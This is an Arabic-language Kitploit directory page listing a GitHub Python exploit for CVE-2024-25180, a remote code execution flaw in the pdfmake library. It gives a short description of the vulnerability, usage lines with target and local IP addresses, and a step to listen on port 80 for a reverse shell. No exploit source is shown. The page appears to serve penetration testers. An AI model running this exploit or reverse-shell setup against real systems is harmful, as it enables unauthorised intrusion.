Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-25180 — نص استغلال بايثون لـ CVE-2024-25180، ثغرة تنفيذ كود عن بعد في pdfmake، تسليم شل عكسية عبر طلبات POST مصممة. | Kitploit
أدوات/GitHubGitHub/dustblessnotdust/cve-2024-25180
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubdustblessnotdust/cve-2024-25180

CVE-2024-25180

نص استغلال بايثون لـ CVE-2024-25180، ثغرة تنفيذ كود عن بعد في pdfmake، تسليم شل عكسية عبر طلبات POST مصممة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-25180

نظرة عامة

pdfmake هي مكتبة JavaScript خالصة لطباعة PDF من جانب العميل/الخادم. الإصدارات المتأثرة من هذه الحزمة معرضة لهجمات حقن الأكواد التعسفية، حيث يمكن للمهاجم تنفيذ أكواد تعسفية عن طريق إرسال طلب POST مصمم خصيصًا للمسار/pdf. يمكن للمهاجم تنفيذ أكواد تعسفية على النظام عن طريق إرسال طلب مصمم خصيصًا.

CVE-2024-25180 تنفيذ الأكواد عن بُعد في pdfmake

استغلال السكربت

root@kitploit:~
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>

python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80

استمع على المنفذ 80 للحصول على قوقعة عكسية (reverse shell)

image

تنزيل الأداة